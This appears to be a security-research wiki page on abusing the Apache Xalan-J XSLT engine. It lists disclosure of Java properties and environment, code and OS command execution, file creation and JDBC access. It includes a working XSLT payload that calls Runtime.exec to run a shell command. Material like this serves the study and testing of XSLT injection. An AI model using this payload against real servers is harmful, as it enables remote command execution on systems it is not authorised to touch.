Engine_XalanJ

Xalan-J is a Java based XSLT engine by the Apache Project.

Supported version

1.0

Command line

$> java org.apache.xalan.xslt.Process -in foo.xml -xsl foo.xsl

Note : xml-apis.jar, xercesImpl.jar and xalan*.jar must be in the $CLASSPATH

Identification strings

Special features

• Java properties disclosure
• Java environment disclosure
• Java code execution
• OS command execution
• File creation
• JDBC connectivity

Java properties disclosure

The xsl:system-property() standard function can be called with non standard arguments, mapped to Java properties. In this example, the name of the Java properties is stored in a separate XML file (properties.xml). The XSLT code will, for each property, display its name and its value.

Java environment disclosure

The checkEnvironment() extension function (documented here) will display some information about the execution context (including available packages, paths, versions, ...).

Java code execution

The attached code will display the current date using a newly created "java.util.Date" object. This should be enough to demonstrate Java code execution.

OS command execution

The following code will execute the command "touch /tmp/hello" :

<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:j="http://xml.apache.org/xalan/java"
                exclude-result-prefixes="j"
                version="1.0">
    <xsl:template match="/">
        <xsl:variable name="c"><![CDATA[touch = /tmp/hello]]></xsl:variable>
        <xsl:variable name="a" select="j:split($c, ' = ')"/>
        <xsl:variable name="r" select="j:java.lang.Runtime.getRuntime()"/>
        <xsl:variable name="p" select="j:exec($r, $a )"/>
        No content at the moment ...
    </xsl:template>
</xsl:stylesheet>